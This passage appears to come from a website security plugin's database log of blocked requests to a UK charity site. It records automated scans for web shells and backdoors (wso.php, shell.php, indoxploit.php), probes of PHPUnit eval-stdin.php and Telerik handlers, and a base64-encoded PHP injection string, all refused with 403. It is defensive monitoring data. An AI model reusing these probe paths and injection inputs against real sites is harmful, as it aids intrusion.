Safari\\/537.36\",\"2\":\"www.google.com\"}','jKpXMBiu5gEJtdPbsa7LZolm',0,1675047199.3317,109,'','GET',403,0,700,0,1,'',0),('185.150.191.81',3113664337,'','https://www.equalitywalk.org.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','zoZ1QaJL3nEf0TsKUXcCwBY7',0,1675047292.4769,760,'','POST',403,0,700,0,1,'',0),('185.150.191.81',3113664337,'','https://www.equalitywalk.org.uk/vnarzavc.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','BURnI9adS4s6okOc1hwC7P3b',0,1675047293.5457,1663,'','GET',403,0,700,0,1,'',0),('185.150.191.81',3113664337,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','t260rqkWzgpdfbRTJGLNix5H',0,1675047295.5772,390,'','GET',403,0,700,0,1,'',0),('185.150.191.81',3113664337,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','QkuyIRGN2g4mnfWZjpB8twSz',0,1675047296.2659,555,'','GET',403,0,700,0,1,'',0),('176.31.110.126',2954849918,'','https://www.equalitywalk.org.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','VF3pegy6LQHEUrJfDsIdCNmj',0,1675054518.6621,189,'','GET',403,0,700,0,1,'',0),('176.31.110.126',2954849918,'','https://www.equalitywalk.org.uk/wp-setups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','icaMG69k85IYtLBlfQCudWvq',0,1675054519.0247,145,'','GET',403,0,700,0,1,'',0),('176.31.110.126',2954849918,'','https://www.equalitywalk.org.uk/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','L1Dyi0vCaFUGtSo9u4Vw3XKJ',0,1675054519.2789,121,'','GET',403,0,700,0,1,'',0),('176.31.110.126',2954849918,'','https://www.equalitywalk.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','MfHVEI1SunxOvQjz42LTChrY',0,1675054519.5097,98,'','POST',403,0,700,0,1,'',0),('176.31.110.126',2954849918,'','https://www.equalitywalk.org.uk/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','MbyI5kTuriK0URAQOYSWqhCE',0,1675054519.8195,94,'','GET',403,0,700,0,1,'',0),('176.31.110.126',2954849918,'','https://www.equalitywalk.org.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','kuoSf38yRVwxT7OlXg4aetrs',0,1675054520.2027,86,'','POST',403,0,700,0,1,'',0),('176.31.110.126',2954849918,'','https://www.equalitywalk.org.uk/wp-story.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','hMjnzrV9bURekY5tcHD4OsAw',0,1675054520.4732,92,'','GET',403,0,700,0,1,'',0),('176.31.110.126',2954849918,'','https://www.equalitywalk.org.uk/wp-story.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','VGYxki1QaIZv0lFupytC5A4X',0,1675054520.6207,86,'','POST',403,0,700,0,1,'',0),('176.31.110.126',2954849918,'','https://www.equalitywalk.org.uk/simple.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','jZBDrLQG1asbJgxd43K6CUmS',0,1675054520.8075,137,'','GET',403,0,700,0,1,'',0),('108.167.189.32',1822932256,'','https://equalitywalk.org.uk/991176.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/991176.php\"}','qeAUufH5jFTSJmxOGrb1a0NE',0,1675077057.4146,312,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://www.equalitywalk.org.uk//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','6rVbt4CXKT2nAvOaw53BEDzc',0,1675079147.9784,801,'','GET',403,0,700,0,1,'',0),('51.68.11.223',860097503,'','https://equalitywalk.org.uk/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/small.php\"}','9K6D0eYEyHdSWqgtJau2Unzf',0,1675081327.5465,105,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','rPNFvVw6InDfMY57bBHtXWkQ',0,1675094893.3342,121,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','Q8MKGnSvsbOLEWq0puNPrVjg',0,1675094893.6336,122,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','ZIBaM6Drxm1kpRfwhTUsJoqF',0,1675094895.6347,104,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','hX3vNdzkbJxAMFiG9qeDRYy5',0,1675094896.0080,159,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','GioEuR9sapO7T2kzMSwn1B65',0,1675094896.4199,86,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','fM92KacCkNj8EWAbm3Y7v5FV',0,1675094897.2632,127,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','YUvCNRDmk6uSGQ7Mnh0qcxsX',0,1675094897.8294,97,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','xcl9zf6PejbQkRU0AZ3osSiX',0,1675094898.9955,110,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','3dAQnNgsKByMerTRUa91IJxt',0,1675094899.2520,107,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','dh1INgtmErUWqlG9MJXKwzTR',0,1675094899.7501,104,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','u0EltL12AZWPpRX3VUsMTnOk',0,1675094900.3841,97,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','groiD4tPXuA8BxqdmkwQLOyn',0,1675094901.1924,100,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','Jnx316Ul4RyTsVKN8Cbvahjq',0,1675094901.4835,103,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','ZPp2HAUGfk6BXh7VO3lN0WgJ',0,1675094901.8252,86,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','rPuj2XbLEDvo7mtQcRVT3YCN',0,1675094902.3119,93,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/modules/modules/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','hKwe6vTPfODqFgix085kzN2o',0,1675094902.5402,86,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php','','{\"1\":\"python-requests\\/2.27.1\"}','RkdVmIxgzHEntU8wiyXs5AGN',0,1675094902.7589,92,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/modules/mod_simplefileuploadv1.3/elements/udd.php','','{\"1\":\"python-requests\\/2.27.1\"}','wOXYfpTU9bLz1IrDx3dPM4vm',0,1675094903.0601,99,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/libraries/joomla/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','iqlmREKh3bf7kXrwSj82yUeA',0,1675094903.3935,97,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/libraries/joomla/jmails.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','lqGJUN6sfK1z7W5u3ItDZ9PV',0,1675094903.6360,114,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/libraries/joomla/jmail.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','WfprNCwi5Gon3MvX897q2h0K',0,1675094904.0182,101,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','PxsBifgmdGDerzEWHMlNLaAY',0,1675094904.2761,230,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/tmp/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','UDAsnLyErJ0jq2Nwt4zaf13c',0,1675094904.6650,122,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/XxX.php','','{\"1\":\"python-requests\\/2.27.1\"}','57v4JF9cPHVNm6TCBrYhz10G',0,1675094905.0322,145,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/Marvins.php','','{\"1\":\"python-requests\\/2.27.1\"}','eOvzLZS4xTMkhWHnJ8ywBC5i',0,1675094905.5240,100,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/rxr.php?rxr','','{\"1\":\"python-requests\\/2.27.1\"}','GEnF4HjWKAOgf1R0Iov6qmsP',0,1675094905.9291,157,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','UY2JFwGd6zIVbjiyDu1fEHoO',0,1675094906.4059,121,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','qID8wtiZ167Cek9NBQTU0moy',0,1675094906.7310,118,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','ZXqMWKPamTiswdAhSv0BoLcp',0,1675094907.1431,128,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/RxR.php','','{\"1\":\"python-requests\\/2.27.1\"}','EbRoX0TKHd4hJy6nuLz39qCf',0,1675094907.7030,132,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/components/com_b2jcontact/izoc.php','','{\"1\":\"python-requests\\/2.27.1\"}','ZHp8fxYTDv67ULnwQ5yM2tgI',0,1675094908.0520,96,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/V3.php','','{\"1\":\"python-requests\\/2.27.1\"}','LWfD74u6Rl5ijypM1XGAQHKP',0,1675094908.4332,111,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','CeQIjZ53UONJaoLrlE0XsbcK',0,1675094908.7292,106,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','QdCouMyxUR5vYAmcDnJH74BV',0,1675094909.6702,96,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','MfawCSIOh6ZVxQ4DTzmNBWiR',0,1675094910.1050,106,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','aKYvSmCihLk4H7o2FDbnqV39',0,1675094910.5357,99,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/administrator/templates/bluestork/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','vrHp6JALRWX3iFeqnPNSodQ4',0,1675094910.8804,116,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/administrator/templates/bluestork/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','p0bOcVlrX5IEtuwN9JxWBDGC',0,1675094911.2607,125,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/administrator/templates/hathor/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','4vqQW1ZtVg6hRHafUBi2GpFX',0,1675094911.5375,105,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/administrator/templates/hathor/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','retd5Xwn60zTA3JNblygGKxa',0,1675094911.8910,756,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/administrator/templates/isis/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','qbiLg4J7MmSyzRoNIYZpQTHu',0,1675094912.8911,109,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/administrator/templates/isis/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','O9TdgC5WqPEuzvkYf8XVsb6w',0,1675094913.3345,162,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/beez/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','4RQB2tfAclsaGjxuEkIySgWK',0,1675094913.8058,114,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/ja_purity/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','AUyJO5lw0k2QWBGYEvhIKz1u',0,1675094914.5330,106,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/rhuk_milkyway/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','5S2hxRtsKYqJO9FaDzNTMw68',0,1675094914.9910,85,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/system/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','ufwQ8n46IBYGHtxhM7omVWv5',0,1675094915.4917,95,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/system/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','A7xhqu9OCKe3GiPcXjorLfRQ',0,1675094915.7729,95,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/beez3/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','a1kCh2f0Q9vruoBjs8qElzxm',0,1675094916.2496,93,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/beez3/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','ceA8QKEJYkz5o4Id7OCN1SfB',0,1675094916.6589,105,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/beez5/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','Dc32uaZNImb5yhklBdXx0iCH',0,1675094917.3036,161,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/beez5/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','bKdS5G6Mjq2kiEt7wP1OrXhp',0,1675094917.7234,94,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/beez_20/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','Q5mtWHzjEwuRkoSgDOsh3ZvN',0,1675094918.1235,100,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/beez_20/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','vIOgb0twWDQ3qRCU8f6pilkL',0,1675094918.5350,121,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/protostar/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','zXQdUG4vhRP2wIsEuLMq19Vy',0,1675094919.0016,94,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/protostar/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','i2TLtQMf3Ol1rz805mwkdu4q',0,1675094919.3480,94,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/atomic/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','VeKbCSIkOYq9FZzuoNALXBl1',0,1675094919.7352,90,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/templates/atomic/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','qliT49rdI0U1s8gPnScmxZ7E',0,1675094920.4050,104,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','g85NodPjsDw3z6HamAuJtVMb',0,1675094920.9173,151,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','IAacrJBt0moDshNOVnW5pU8l',0,1675094921.4350,123,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','a7MNxi4yS1fzXkTl395hVF8v',0,1675094921.9982,95,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','twkTEv9lWoY13Us2LMBumxgH',0,1675094922.2396,94,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','xUvdPiTwO03esQfHl5S2mIuc',0,1675094925.5506,98,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','g2WTFqOod389Gh7kx1enCVE4',0,1675094926.0638,164,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','4TgPDJ573089dXmRseMiaECf',0,1675094926.5914,95,'','GET',403,0,700,0,1,'',0),('147.78.47.230',2471374822,'','https://www.equalitywalk.org.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.82 Safari\\/537.36\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/wp-reset.php\"}','25jBtzs8yVHxIorENUOQh7ui',0,1675119722.8417,148,'','GET',403,0,700,0,1,'',0),('125.65.229.13',2101470477,'','https://www.equalitywalk.org.uk/wp-includes/admins.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/wp-includes\\/admins.php\"}','hyfK5OVi87lzY2nmNwHkMXCg',0,1675132130.4308,150,'','GET',403,0,700,0,1,'',0),('182.145.92.91',3062979675,'','https://www.equalitywalk.org.uk/1.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/1.php\"}','wpZOzLA1gDfWVCFhB7tUXyGR',0,1675132130.4344,192,'','GET',403,0,700,0,1,'',0),('182.145.92.11',3062979595,'','https://www.equalitywalk.org.uk/wp-admin/1.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/wp-admin\\/1.php\"}','NBzVg6pdXj2MEcSlIP35YaW4',0,1675132131.1836,117,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.equalitywalk.org.uk/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','t1V6EDWpahBU8C3kRxAuSdyj',0,1675134562.5492,18384,'','GET',403,0,700,0,1,'',0),('54.37.121.239',908425711,'','https://equalitywalk.org.uk/wp-admin/patior/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/patior\\/index.php\"}','BtM8ZzPLocJ54eR3fbvCEajh',0,1675137778.1248,721,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.equalitywalk.org.uk/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','kyzBOsCILlwd1XbJxGr4pEfH',0,1675141803.9640,241,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.equalitywalk.org.uk/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','Ja2Dg6w7ZKtNV3izEhsAWf8X',0,1675141804.9852,108,'','GET',403,0,700,0,1,'',0),('154.247.138.225',2599914209,'','https://www.equalitywalk.org.uk/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx','','{\"1\":\"python-requests\\/2.27.1\"}','l4Aj0mfzrsOJbudVv8yPCTt7',0,1675141805.9366,124,'','GET',403,0,700,0,1,'',0),('67.205.150.91',1137546843,'','https://equalitywalk.org.uk/patior/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/patior\\/index.php\"}','DIGgpESxmFioM7Z0rvUbuXOw',0,1675148096.0363,158,'','GET',403,0,700,0,1,'',0),('51.68.11.195',860097475,'','https://equalitywalk.org.uk/wp-info.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-info.php\"}','YgyBv6wtceJhZqrQkE3U1pdK',0,1675156412.7419,159,'','GET',403,0,700,0,1,'',0),('194.169.175.26',3265900314,'','https://www.equalitywalk.org.uk/wso112233.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','rx3akeZRd78NB4bOLETu5qn2',0,1675165002.4561,169,'','GET',403,0,700,0,1,'',0),('194.169.175.26',3265900314,'','https://www.equalitywalk.org.uk/bala.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','vwLUmrz6lisWo5EagqxyKZjI',0,1675165018.2249,137,'','GET',403,0,700,0,1,'',0),('194.169.175.26',3265900314,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Pbc4RDQzjYMoO0ErG9J7Bq2a',0,1675165040.1658,158,'','GET',403,0,700,0,1,'',0),('194.169.175.26',3265900314,'','https://www.equalitywalk.org.uk/xleet-shell.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','KYlSmDiTNcn97QHthPfyZJ0x',0,1675165049.3510,449,'','GET',403,0,700,0,1,'',0),('194.169.175.26',3265900314,'','https://www.equalitywalk.org.uk/wp-admin/xleet-shell.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Hf7laGgVwK0oMsNPb5OT2nWj',0,1675165056.7126,133,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://equalitywalk.org.uk/wp-admin/css/colors/colors.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','02GNjoiXLYWDbzQdUtkMZwhS',0,1675192775.6193,139,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://equalitywalk.org.uk/wp-includes/wp-includes.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux 